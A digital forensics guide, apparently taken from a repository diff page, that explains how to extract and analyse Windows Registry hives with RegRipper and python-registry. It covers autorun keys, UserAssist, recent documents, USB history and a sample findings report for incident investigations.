||||
# Analyzing Windows Registry for Artifacts
|
||||
|
||||
## When to Use
|
||||
- When investigating user activity on a Windows system during an incident
|
||||
- For identifying autorun/persistence mechanisms used by malware
|
||||
- When tracing installed software, USB devices, and network connections
|
||||
- During insider threat investigations to reconstruct user actions
|
||||
- For correlating registry timestamps with other forensic artifacts
|
||||
|
||||
## Prerequisites
|
||||
- Forensic image or extracted registry hive files
|
||||
- RegRipper, Registry Explorer (Eric Zimmerman), or python-registry
|
||||
- Access to registry hive locations (SAM, SYSTEM, SOFTWARE, NTUSER.DAT, UsrClass.dat)
|
||||
- Understanding of Windows Registry structure (hives, keys, values)
|
||||
- SIFT Workstation or forensic analysis environment
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Extract Registry Hives from the Forensic Image
|
||||
|
||||
```bash
|
||||
# Mount the forensic image read-only
|
||||
mkdir /mnt/evidence
|
||||
mount -o ro,loop,offset=$((2048*512)) /cases/case-2024-001/images/evidence.dd /mnt/evidence
|
||||
|
||||
# Copy system registry hives
|
||||
cp /mnt/evidence/Windows/System32/config/SAM /cases/case-2024-001/registry/
|
||||
cp /mnt/evidence/Windows/System32/config/SYSTEM /cases/case-2024-001/registry/
|
||||
cp /mnt/evidence/Windows/System32/config/SOFTWARE /cases/case-2024-001/registry/
|
||||
cp /mnt/evidence/Windows/System32/config/SECURITY /cases/case-2024-001/registry/
|
||||
cp /mnt/evidence/Windows/System32/config/DEFAULT /cases/case-2024-001/registry/
|
||||
|
||||
# Copy user-specific hives
|
||||
cp /mnt/evidence/Users/*/NTUSER.DAT /cases/case-2024-001/registry/
|
||||
cp /mnt/evidence/Users/*/AppData/Local/Microsoft/Windows/UsrClass.dat /cases/case-2024-001/registry/
|
||||
|
||||
# Copy transaction logs (for dirty hive recovery)
|
||||
cp /mnt/evidence/Windows/System32/config/*.LOG* /cases/case-2024-001/registry/logs/
|
||||
|
||||
# Hash all extracted hives
|
||||
sha256sum /cases/case-2024-001/registry/* > /cases/case-2024-001/registry/hive_hashes.txt
|
||||
```
|
||||
|
||||
### Step 2: Analyze with RegRipper for Automated Artifact Extraction
|
||||
|
||||
```bash
|
||||
# Install RegRipper
|
||||
git clone https://github.com/keydet89/RegRipper3.0.git /opt/regripper
|
||||
|
||||
# Run RegRipper against NTUSER.DAT (user profile)
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/NTUSER.DAT \
|
||||
-f ntuser > /cases/case-2024-001/analysis/ntuser_report.txt
|
||||
|
||||
# Run against SYSTEM hive
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SYSTEM \
|
||||
-f system > /cases/case-2024-001/analysis/system_report.txt
|
||||
|
||||
# Run against SOFTWARE hive
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SOFTWARE \
|
||||
-f software > /cases/case-2024-001/analysis/software_report.txt
|
||||
|
||||
# Run against SAM hive (user accounts)
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SAM \
|
||||
-f sam > /cases/case-2024-001/analysis/sam_report.txt
|
||||
|
||||
# Run specific plugins
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/NTUSER.DAT \
|
||||
-p userassist > /cases/case-2024-001/analysis/userassist.txt
|
||||
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SYSTEM \
|
||||
-p usbstor > /cases/case-2024-001/analysis/usbstor.txt
|
||||
```
|
||||
|
||||
### Step 3: Extract Persistence and Autorun Entries
|
||||
|
||||
```bash
|
||||
# Using python-registry for targeted extraction
|
||||
pip install python-registry
|
||||
|
||||
python3 << 'PYEOF'
|
||||
from Registry import Registry
|
||||
|
||||
# Open SOFTWARE hive
|
||||
reg = Registry.Registry("/cases/case-2024-001/registry/SOFTWARE")
|
||||
|
||||
# Check Run keys (autostart)
|
||||
autorun_paths = [
|
||||
"Microsoft\\Windows\\CurrentVersion\\Run",
|
||||
"Microsoft\\Windows\\CurrentVersion\\RunOnce",
|
||||
"Microsoft\\Windows\\CurrentVersion\\RunServices",
|
||||
"Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run",
|
||||
"Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
|
||||
]
|
||||
|
||||
for path in autorun_paths:
|
||||
try:
|
||||
key = reg.open(path)
|
||||
print(f"\n=== {path} (Last Modified: {key.timestamp()}) ===")
|
||||
for value in key.values():
|
||||
print(f" {value.name()}: {value.value()}")
|
||||
except Registry.RegistryKeyNotFoundException:
|
||||
pass
|
||||
|
||||
# Check installed services
|
||||
key = reg.open("Microsoft\\Windows NT\\CurrentVersion\\Svchost")
|
||||
print(f"\n=== Svchost Groups ===")
|
||||
for value in key.values():
|
||||
print(f" {value.name()}: {value.value()}")
|
||||
PYEOF
|
||||
|
||||
# Check NTUSER.DAT for user-specific autorun
|
||||
python3 << 'PYEOF'
|
||||
from Registry import Registry
|
||||
|
||||
reg = Registry.Registry("/cases/case-2024-001/registry/NTUSER.DAT")
|
||||
|
||||
user_autorun = [
|
||||
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
|
||||
"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",
|
||||
"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run"
|
||||
]
|
||||
|
||||
for path in user_autorun:
|
||||
try:
|
||||
key = reg.open(path)
|
||||
print(f"\n=== {path} (Last Modified: {key.timestamp()}) ===")
|
||||
for value in key.values():
|
||||
print(f" {value.name()}: {value.value()}")
|
||||
except Registry.RegistryKeyNotFoundException:
|
||||
pass
|
||||
PYEOF
|
||||
```
|
||||
|
||||
### Step 4: Analyze User Activity Artifacts
|
||||
|
||||
```bash
|
||||
# Extract UserAssist data (program execution history with ROT13 encoding)
|
||||
python3 << 'PYEOF'
|
||||
from Registry import Registry
|
||||
import codecs, struct, datetime
|
||||
|
||||
reg = Registry.Registry("/cases/case-2024-001/registry/NTUSER.DAT")
|
||||
|
||||
ua_path = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist"
|
||||
key = reg.open(ua_path)
|
||||
|
||||
for guid_key in key.subkeys():
|
||||
count_key = guid_key.subkey("Count")
|
||||
print(f"\n=== {guid_key.name()} ===")
|
||||
for value in count_key.values():
|
||||
decoded_name = codecs.decode(value.name(), 'rot_13')
|
||||
data = value.value()
|
||||
if len(data) >= 16:
|
||||
run_count = struct.unpack('<I', data[4:8])[0]
|
||||
focus_count = struct.unpack('<I', data[8:12])[0]
|
||||
timestamp = struct.unpack('<Q', data[60:68])[0] if len(data) >= 68 else 0
|
||||
if timestamp > 0:
|
||||
ts = datetime.datetime(1601,1,1) + datetime.timedelta(microseconds=timestamp//10)
|
||||
print(f" {decoded_name}: Runs={run_count}, Focus={focus_count}, Last={ts}")
|
||||
else:
|
||||
print(f" {decoded_name}: Runs={run_count}, Focus={focus_count}")
|
||||
PYEOF
|
||||
|
||||
# Extract Recent Documents (MRU lists)
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/NTUSER.DAT \
|
||||
-p recentdocs > /cases/case-2024-001/analysis/recentdocs.txt
|
||||
|
||||
# Extract typed URLs (browser)
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/NTUSER.DAT \
|
||||
-p typedurls > /cases/case-2024-001/analysis/typedurls.txt
|
||||
|
||||
# Extract typed paths in Explorer
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/NTUSER.DAT \
|
||||
-p typedpaths > /cases/case-2024-001/analysis/typedpaths.txt
|
||||
```
|
||||
|
||||
### Step 5: Extract System and Network Information
|
||||
|
||||
```bash
|
||||
# Computer name and OS version from SYSTEM hive
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SYSTEM \
|
||||
-p compname > /cases/case-2024-001/analysis/system_info.txt
|
||||
|
||||
# Network interfaces and configuration
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SYSTEM \
|
||||
-p nic2 >> /cases/case-2024-001/analysis/system_info.txt
|
||||
|
||||
# Wireless network history
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SOFTWARE \
|
||||
-p networklist > /cases/case-2024-001/analysis/network_history.txt
|
||||
|
||||
# Timezone configuration
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SYSTEM \
|
||||
-p timezone > /cases/case-2024-001/analysis/timezone.txt
|
||||
|
||||
# Shutdown time
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SYSTEM \
|
||||
-p shutdown > /cases/case-2024-001/analysis/shutdown.txt
|
||||
|
||||
# Installed software from Uninstall keys
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SOFTWARE \
|
||||
-p uninstall > /cases/case-2024-001/analysis/installed_software.txt
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|
||||
|---------|-------------|
|
||||
| Registry hive | Binary file storing a section of the registry (SAM, SYSTEM, SOFTWARE, NTUSER.DAT) |
|
||||
| MRU (Most Recently Used) | Lists tracking recently accessed files, commands, and search terms |
|
||||
| UserAssist | ROT13-encoded registry entries tracking program execution with timestamps |
|
||||
| ShimCache | Application compatibility cache recording executed programs |
|
||||
| AmCache | Detailed execution history including SHA-1 hashes of executables |
|
||||
| BAM/DAM | Background/Desktop Activity Moderator tracking program execution in Win10+ |
|
||||
| Last Write Time | Timestamp on registry keys indicating when they were last modified |
|
||||
| Transaction logs | Journal files allowing recovery of registry state after improper shutdown |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| RegRipper | Automated registry artifact extraction with plugin architecture |
|
||||
| Registry Explorer | Eric Zimmerman GUI tool for interactive registry analysis |
|
||||
| python-registry | Python library for programmatic registry hive parsing |
|
||||
| RECmd | Eric Zimmerman command-line registry analysis tool |
|
||||
| yarp | Yet Another Registry Parser for Python-based analysis |
|
||||
| AppCompatCacheParser | Dedicated ShimCache/AppCompatCache parser |
|
||||
| AmcacheParser | Dedicated AmCache.hve analysis tool |
|
||||
| ShellBags Explorer | Specialized tool for analyzing ShellBag artifacts |
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: Malware Persistence Investigation**
|
||||
Extract SOFTWARE and NTUSER.DAT hives, check all Run/RunOnce keys for unauthorized entries, examine services for suspicious additions, check scheduled tasks registry keys, correlate autorun timestamps with malware execution timeline.
|
||||
|
||||
**Scenario 2: User Activity Reconstruction**
|
||||
Analyze UserAssist for program execution history, examine RecentDocs for accessed files, check TypedPaths for Explorer navigation, extract ShellBags for folder access patterns, build a timeline of user activity around the incident window.
|
||||
|
||||
**Scenario 3: Unauthorized Software Detection**
|
||||
Parse Uninstall keys for all installed applications, compare against approved software baseline, check BAM/DAM for recently executed programs not in approved list, examine AppCompatCache for execution evidence even after uninstallation.
|
||||
|
||||
**Scenario 4: USB Data Exfiltration Investigation**
|
||||
Extract USBSTOR entries from SYSTEM hive for connected devices, correlate device serial numbers with MountedDevices, check NTUSER.DAT MountPoints2 for user access to removable media, examine SetupAPI logs for first-connection timestamps.
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
Registry Analysis Summary:
|
||||
System: DESKTOP-ABC123 (Windows 10 Pro Build 19041)
|
||||
Timezone: Eastern Standard Time (UTC-5)
|
||||
Last Shutdown: 2024-01-18 23:45:12 UTC
|
||||
|
||||
Autorun Entries:
|
||||
HKLM Run: 5 entries (1 suspicious: "updater.exe" -> C:\ProgramData\svc\updater.exe)
|
||||
HKCU Run: 3 entries (all legitimate)
|
||||
Services: 142 entries (2 unknown: "WinDefSvc", "SysMonAgent")
|
||||
|
||||
User Activity (NTUSER.DAT):
|
||||
UserAssist Programs: 234 entries
|
||||
Recent Documents: 89 entries
|
||||
Typed URLs: 45 entries
|
||||
Typed Paths: 12 entries
|
||||
|
||||
USB Devices Connected:
|
||||
- Kingston DataTraveler (Serial: 0019E06B4521) - First: 2024-01-10, Last: 2024-01-18
|
||||
- WD My Passport (Serial: 575834314131) - First: 2024-01-15, Last: 2024-01-15
|
||||
|
||||
Installed Software: 127 applications
|
||||
Suspicious Findings: 3 items flagged for review
|
||||
```
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user